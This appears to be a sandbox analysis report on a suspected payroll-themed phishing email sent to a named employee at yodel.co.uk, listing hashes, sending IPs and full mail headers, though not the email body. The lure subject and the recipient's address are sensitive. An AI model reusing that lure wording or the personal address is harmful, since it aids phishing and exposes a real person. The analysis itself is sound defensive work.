SHA1: B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
SHA-256: FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
SHA-512: F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
Malicious: false
Reputation: unknown
URL: https://code.jquery.com/jquery-3.6.0.min.js
Preview:
File type: RFC 822 mail, ASCII text, with very long lines (327), with CRLF line terminators
Entropy (8bit): 6.171876514608292
TrID:
• E-Mail message (Var. 5) (54515/1) 100.00%
File name: f64da42c-e9a8-a0ac-437d-d14377da4643.eml
File size: 108'732 bytes
MD5: 72d477110463da85c47b6a3d7a6bcb5f
SHA1: b406c919997c8ce218ce73c6c03728445924ef64
SHA256: 42c140d453c2715598c974b451b051b8299f57b9889331251399723408a95c68
SHA512: e5937182b99c76b9d51c4e8f8ff23c47bbd310415f8ebf54e272ee3b60ca130416d010b39d6a005fd76cbcb3f434420b67cefa0555adfefad70fb3858e897e8b
SSDEEP: 1536:m7p4n3DU8tNkmeTQXOWqf0czLGgz7EveCbsjkHYk31sUqA9t0VCSCGG9abmVv3K6:mgRX7qffLGC7KbtRr0VC4DbmZgM
TLSH: 23B3B07E2FAA05B1CE4132EE0D01BC1B6DB51EB7A87350E23E740E62588F9D94F5254B
File Content Preview: Received: from AS2PR05MB10710.eurprd05.prod.outlook.com.. (2603:10a6:20b:649::10) by PAXPR05MB9640.eurprd05.prod.outlook.com with.. HTTPS; Sat, 15 Mar 2025 14:52:30 +0000..Received: from DU7P190CA0012.EURP190.PROD.OUTLOOK.COM (2603:10a6:10:550::11).. by A
Subject: Yodel Co. - Payroll Processing Completed Saturday, March 15, 2025 11:52:16 PM, REF ID-MNBVCXZ
From: Noreply <muro.kenji@garde-intl.com>
To: terry.tuttle@yodel.co.uk
Cc:
BCC:
Date: Sat, 15 Mar 2025 14:52:24 +0000
Communications:
• [You don't often get email from muro.kenji@garde-intl.com. Learn why this is important at https://aka.ms/LearnAboutSenderIdentification ] [CAUTION] This email originated outside of our organisation. Be cautious of opening any links or file attachments
Attachments:
Key: Value
Received: from unknown (HELO 52597.ip-ptr.tech) (muro.kenji@garde-intl.com@147.45.49.87) by 0 with SMTP; 15 Mar 2025 23:52:24 +0900
Authentication-Results: spf=pass (sender IP is 27.34.154.55) smtp.mailfrom=garde-intl.com; dkim=none (message not signed) header.d=none;dmarc=bestguesspass action=none header.from=garde-intl.com;compauth=pass reason=109
Received-SPF: Pass (protection.outlook.com: domain of garde-intl.com designates 27.34.154.55 as permitted sender) receiver=protection.outlook.com; client-ip=27.34.154.55; helo=garde-intl.com; pr=C
X-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
X-Accept-Language: en-us, en
X-Mailer: Roundcube Webmail
X-Reply-To: reply-to-email@ap.com
X-Date: Sat, 15 Mar 2025 14:52:24 GMT
From: Noreply <muro.kenji@garde-intl.com>
To: terry.tuttle@yodel.co.uk
Subject: Yodel Co. - Payroll Processing Completed Saturday, March 15, 2025 11:52:16 PM, REF ID-MNBVCXZ
Message-ID: <288c32e7-238a-e1d9-3b66-5e4d20c3ff5a@garde-intl.com>
Date: Sat, 15 Mar 2025 14:52:24 +0000
Return-Path: muro.kenji@garde-intl.com
X-EOPAttributedMessage: 0
X-EOPTenantAttributedMessage: 43de160c-6e69-45b2-a9cd-7e215970887d:0
X-MS-PublicTrafficType: Email
X-MS-TrafficTypeDiagnostic: DB1PEPF000509FA:EE_|AS2PR05MB10710:EE_|PAXPR05MB9640:EE_
X-MS-Office365-Filtering-Correlation-Id: e0ec0015-cd87-4847-11ba-08dd63d100b0
X-MS-Exchange-AtpMessageProperties: SA|SL
Content-Type: multipart/mixed; boundary="_d3e9ceb2-4166-4248-9591-5f1196cd881b_"
X-Microsoft-Antispam: BCL:0;ARA:13230040|4053099003|43540500003;
X-Forefront-Antispam-Report: CIP:27.34.154.55;CTRY:JP;LANG:en;SCL:1;SRV:;IPV:NLI;SFV:NSPM;H:garde-intl.com;PTR:ybxxqa55.secure.ne.jp;CAT:NONE;SFTY:9.25;SFS:(13230040)(4053099003)(43540500003);DIR:INB;SFTY:9.25;
X-MS-Exchange-CrossTenant-OriginalArrivalTime: 15 Mar 2025 14:52:25.9675 (UTC)
X-MS-Exchange-CrossTenant-Network-Message-Id: e0ec0015-cd87-4847-11ba-08dd63d100b0
X-MS-Exchange-CrossTenant-Id: 43de160c-6e69-45b2-a9cd-7e215970887d
X-MS-Exchange-CrossTenant-AuthSource: DB1PEPF000509FA.eurprd03.prod.outlook.com
X-MS-Exchange-CrossTenant-AuthAs: Anonymous
X-MS-Exchange-CrossTenant-FromEntityHeader: Internet
X-MS-Exchange-Transport-CrossTenantHeadersStamped: AS2PR05MB10710
X-MS-Exchange-Transport-EndToEndLatency: 00:00:04.4948785
X-MS-Exchange-Processed-By-BccFoldering: 15.20.8534.017
X-Microsoft-Antispam-Mailbox-Delivery: ucf:0;jmr:0;auth:0;dest:I;ENG:(910005)(944506478)(944626604)(4710137)(4712020)(920097)(930097)(140003)(1420198);
X-Microsoft-Antispam-Message-…
MIME-Version: 1.0

Icon Hash: 46070c0a8e0c67d6